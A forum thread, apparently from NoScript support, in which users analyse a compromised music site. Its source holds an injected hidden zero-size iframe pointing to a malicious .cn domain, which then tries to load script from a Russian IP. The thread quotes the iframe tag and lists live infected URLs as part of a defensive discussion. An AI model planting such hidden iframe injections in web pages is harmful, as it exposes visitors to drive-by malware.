Why does .CN show as Allowable?

[therube]

NOTE: SITES CONTAIN MAILWARE

NOTE: SITES CONTAIN MALWARE


URL: view-source:http://www.8bitfm.com/

At the very bottom of the page is found:

Code: Select all

<iframe src="http://reycross.cn/qaqa/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Why is NoScript blocking (which is a good thing) the site? And in the same manner, why is NoScript context menu offering to Allow reycross.cn?

As in like, where is the <script>?
So is NoScript treating a foreign domain found in an iframe as if it were <script>?


Or is it being treated as an <object> & being blocked by the Forbid other plugins restriction?


Note that on a site like this, http://www.stargateteam.de/include.php?path=misc/suggest.php (which contain the same exploit) which is slow loading for me, the Blocked Objects context menu is slow to appear. So if you happen to look once - as the page is loading, it may not yet be there, but if you look again, later, it will be.

PS: Google flags this second site, http://www.google.com/interstitial?url=http://www.stargateteam.de/include.php%3Fpath%3Dmisc/suggest.php%26suggest_path%3Dpath%253Dcontent%252Fnews.php%2526contentid%253D12%26PHPKITSID%3D2ea533cd867c1eac097cf84d0086ab92

[Tom T.]

A lot of sites support e-mail. I think you meant "malware" in your warning.

What's even more interesting is that if you allow the iFrame (tagged, "hidden"), but *not* the script, a new script appears in Allow menu: 91.212.198.16

IP address: 91.212.198.16
No host name is associated with this IP address or no reverse lookup is configured.
Error:Host not found
91.212.198.16 is from Russian Federation(RU) in region Eastern Europe

The long-feared Sino-Russian Alliance? (known during the Cold War as the Sino-Soviet Alliance).

[therube]

(Fixed 'mailware'.)

Since you brought it up ... http://www.dslreports.com/speak/print/default;22703885 & the full thread, http://www.dslreports.com/forum/r22702532-8bitfm.

How did you "Allow" this IFRAME?

[Tom T.]

Does anyone alert these sites that they've been infected? (did you?) Do the AV people?
Aren't you glad you use NS, esp. since you don't use AV? (some in that thread were getting AV alerts, since they did not have the blocking power of NS).
Interesting. Someone needs to tell every site where it's found, and Interpol or someone needs to crack down on the people behind this kind of stuff.

How did you "Allow" this IFRAME?

NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Done in a sandboxed browser. Didn't allow the Russian script, of course, but if there were anything malicious in the iframe itself, it would have been isolated from the rest of the machine (rest of HD is read-only to a sandboxed browser) and flushed when the browser was closed. I don't see how malsites can be investigated safely otherwise.

[therube]

> NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Now why didn't I think of that?

8bit has been notified.
But exploits like this (or the ones luntrus posts) are so pervasive. Just Google some of the strings used in the exploits.
Its more the website hosts & then the webmasters that need to get on the ball to try to stay ahead of the game.

[therube]

So this morning, I get to thinking, now why does reycross.cn "turn" into 91.212.198.16?

And then it was like, duh!

Because I had <IFRAME> blocked, reycross.cn never "ran".
Since reycross.cn never ran, in turn 91.212.198.16 was never loaded.

But once I allowed <IFRAME>, then reycross.cn "ran".
Which subsequently attemped to "run" 91.212.198.16, which relies upon <script>, which NoScript then happily blocked.

So two avenues of protection.
First <IFRAME> was blocked. By doing so, that thwarted the start of the malware process.
Secondly, once <IFRAME> was allowed, NoScript then blocked the <script> that was subsequently attempting to run.

Good job.


view-source:http://reycross.cn/qaqa/

[Tom T.]

> NS > Options > Plug-ins > Uncheck "Forbid <IFRAME>".

Now why didn't I think of that?

I was wondering that myself. But we all have our share of brain flatulence -- I know I do.

8bit has been notified.
But exploits like this (or the ones luntrus posts) are so pervasive. Just Google some of the strings used in the exploits.
Its more the website hosts & then the webmasters that need to get on the ball to try to stay ahead of the game.

For that matter, couldn't ISPs add such strings to their filter lists? There are a lot fewer ISPs than web sites; it would be a real service, both to the sites they host for and for their end-user customers, and they'd save a bundle in bandwidth. What say?

[Tom T.]

So this morning, I get to thinking, now why does reycross.cn "turn" into 91.212.198.16?

And then it was like, duh!

Because I had <IFRAME> blocked, reycross.cn never "ran".
Since reycross.cn never ran, in turn 91.212.198.16 was never loaded.

But once I allowed <IFRAME>, then reycross.cn "ran".
Which subsequently attemped to "run" 91.212.198.16, which relies upon <script>, which NoScript then happily blocked.

So two avenues of protection.
First <IFRAME> was blocked. By doing so, that thwarted the start of the malware process.
Secondly, once <IFRAME> was allowed, NoScript then blocked the <script> that was subsequently attempting to run.

Good job.

Not sure if the last comment was intended for NS or for myself, but either way...
Yep, NS was double-protection if you run 100%-lockdown as I do (all "plugin" options checked); and the first layer had to be deliberately allowed even to see the second.

Which brings us to the suggestion in another thread, mostly retracted, that "TA all this page" should also TA all subsequent layers of script loading. Here is a perfect example of why that is not a good idea. Under the current setup, even if you TA'd the page with reycross, it seems no harm would come. You'd see the 91 script, it would be a heads-up, and you'd be alerted to investigate before allowing -- or just don't allow it.

[therube]

Not sure if the last comment was intended for NS or for myself, but either way...

Yes.

Which brings us to the suggestion in another thread ... that "TA all this page" should also TA all subsequent layers of script loading. Here is a perfect example of why that is not a good idea. Under the current setup, even if you TA'd the page with reycross, it seems no harm would come. You'd see the 91 script, it would be a heads-up, and you'd be alerted to investigate before allowing -- or just don't allow it.

Correct.